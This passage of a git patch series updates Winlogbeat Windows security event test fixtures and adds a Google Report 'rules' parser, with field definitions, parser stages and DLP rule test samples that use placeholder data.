l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}" + } }, "expected": { "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}", diff --git a/Beats/winlogbeat/tests/security_event_4798.json b/Beats/winlogbeat/tests/security_event_4798.json index b69049f3d..3e7783fbd 100644 --- a/Beats/winlogbeat/tests/security_event_4798.json +++ b/Beats/winlogbeat/tests/security_event_4798.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}" + } }, "expected": { "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", From 97df98680856146f65f7555985ef2764e75c5312 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Thu, 14 Nov 2024 14:24:35 +0100 Subject: [PATCH 17/84] Add rules service --- Google Cloud/google-report/_meta/fields.yml | 25 +++++++++ .../_meta/smart-descriptions.json | 50 +++++++++++++++++ Google Cloud/google-report/ingest/parser.yml | 23 ++++++++ .../tests/test_rules_sample_1.json | 55 +++++++++++++++++++ .../tests/test_rules_sample_2.json | 55 +++++++++++++++++++ 5 files changed, 208 insertions(+) create mode 100644 Google Cloud/google-report/tests/test_rules_sample_1.json create mode 100644 Google Cloud/google-report/tests/test_rules_sample_2.json diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml index 84b0db0f6..fd683eea8 100644 --- a/Google Cloud/google-report/_meta/fields.yml +++ b/Google Cloud/google-report/_meta/fields.yml @@ -33,6 +33,31 @@ google.report.parameters.visibility: name: google.report.parameters.visibility type: keyword +google.report.rule.data_source: + description: Data source + name: google.report.rule.data_source + type: keyword + +google.report.rule.name: + description: Name of the rule + name: google.report.rule.name + type: keyword + +google.report.rule.scan_type: + description: Scan type + name: google.report.rule.scan_type + type: keyword + +google.report.rule.severity: + description: Severity of the rule + name: google.report.rule.severity + type: keyword + +google.report.rule.type: + description: Rule type + name: google.report.rule.type + type: keyword + google.report.token.app_name: description: Token authorization application name name: google.report.token.app_name diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index 6a934ee3d..9b88f06de 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json @@ -168,6 +168,56 @@ } ] }, + { + "value": "The {google.report.rule.type} action was completed with a severity of {google.report.rule.severity}, using the {google.report.rule.name} rule applied to the {google.report.rule.data_source}", + "conditions": [ + { + "field": "network.application", + "value": "rules" + }, + { + "field": "event.action", + "value": "action_complete" + }, + { + "field": "google.report.rule.severity" + }, + { + "field": "google.report.rule.name" + }, + { + "field": "google.report.rule.data_source" + }, + { + "field": "google.report.rule.type" + } + ] + }, + { + "value": "The {google.report.rule.type} content was matched with a severity of {google.report.rule.severity}, using the {google.report.rule.name} rule applied to the {google.report.rule.data_source}", + "conditions": [ + { + "field": "network.application", + "value": "rules" + }, + { + "field": "event.action", + "value": "content_matched" + }, + { + "field": "google.report.rule.severity" + }, + { + "field": "google.report.rule.name" + }, + { + "field": "google.report.rule.data_source" + }, + { + "field": "google.report.rule.type" + } + ] + }, { "value": "{source.ip} with ID {user.id} changing in the {network.application} application", "conditions": [ diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index bd5fd0d4e..e9640ba28 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -28,6 +28,8 @@ pipeline: filter: '{{ json_event.message.id.applicationName == "admin"}}' - name: set_vault_fields filter: '{{ json_event.message.id.applicationName == "vault"}}' + - name: set_rules_fields + filter: '{{ json_event.message.id.applicationName == "rules"}}' - name: set_parameters_fields filter: '{{ json_event.message.events[0].name == "SUSPEND_USER"}}' @@ -258,3 +260,24 @@ stages: {%- endif -%} {% endfor %} {{ types|unique|list }} + + set_rules_fields: + actions: + - set: + google.report.rule.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "rule_name" %}{{param.value}}{% endif %}{% endfor %}' + google.report.rule.type: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "rule_type" %}{{param.value}}{% endif %}{% endfor %}' + google.report.rule.data_source: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "data_source" %}{{param.value}}{% endif %}{% endfor %}' + google.report.rule.scan_type: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "scan_type" %}{{param.value}}{% endif %}{% endfor %}' + google.report.rule.severity: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "severity" %}{{param.value}}{% endif %}{% endfor %}' + + - set: + event.type: ["info"] + filter: '{{ json_event.message.events[0].name in ["action_complete", "label_applied", "rule_trigger", "rule_match", "content_matched"]}}' + + - set: + event.type: ["deletion"] + filter: '{{ json_event.message.events[0].name == "label_removed"}}' + + - set: + event.type: ["change"] + filter: '{{ json_event.message.events[0].name == "label_field_value_changed"}}' diff --git a/Google Cloud/google-report/tests/test_rules_sample_1.json b/Google Cloud/google-report/tests/test_rules_sample_1.json new file mode 100644 index 000000000..3f7ef889b --- /dev/null +++ b/Google Cloud/google-report/tests/test_rules_sample_1.json @@ -0,0 +1,55 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"233165468629800000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"113328670183616666666\"},\"events\":[{\"type\":\"action_complete_type\",\"name\":\"action_complete\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaq0000000\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka00000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"matched_trigger\",\"value\":\"DRIVE_SHARE\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"233165468629800000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"113328670183616666666\"},\"events\":[{\"type\":\"action_complete_type\",\"name\":\"action_complete\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaq0000000\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka00000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"matched_trigger\",\"value\":\"DRIVE_SHARE\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "event": { + "action": "action_complete", + "dataset": "admin#reports#activity", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-07T14:21:46.270000Z", + "cloud": { + "account": { + "id": "C02i38888" + } + }, + "google": { + "report": { + "actor": { + "email": "john.doe@test.com" + }, + "rule": { + "data_source": "DRIVE", + "name": "DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN", + "scan_type": "DRIVE_ONLINE_SCAN", + "severity": "LOW", + "type": "DLP" + } + } + }, + "network": { + "application": "rules" + }, + "related": { + "user": [ + "john.doe" + ] + }, + "user": { + "domain": "test.com", + "email": "john.doe@test.com", + "id": "113328670183616666666", + "name": "john.doe" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_rules_sample_2.json b/Google Cloud/google-report/tests/test_rules_sample_2.json new file mode 100644 index 000000000..f7a1e9bf9 --- /dev/null +++ b/Google Cloud/google-report/tests/test_rules_sample_2.json @@ -0,0 +1,55 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"-49907177521610000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"11332867018361686666666\"},\"events\":[{\"type\":\"content_matched_type\",\"name\":\"content_matched\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaqDZV\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"-49907177521610000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"11332867018361686666666\"},\"events\":[{\"type\":\"content_matched_type\",\"name\":\"content_matched\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaqDZV\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro 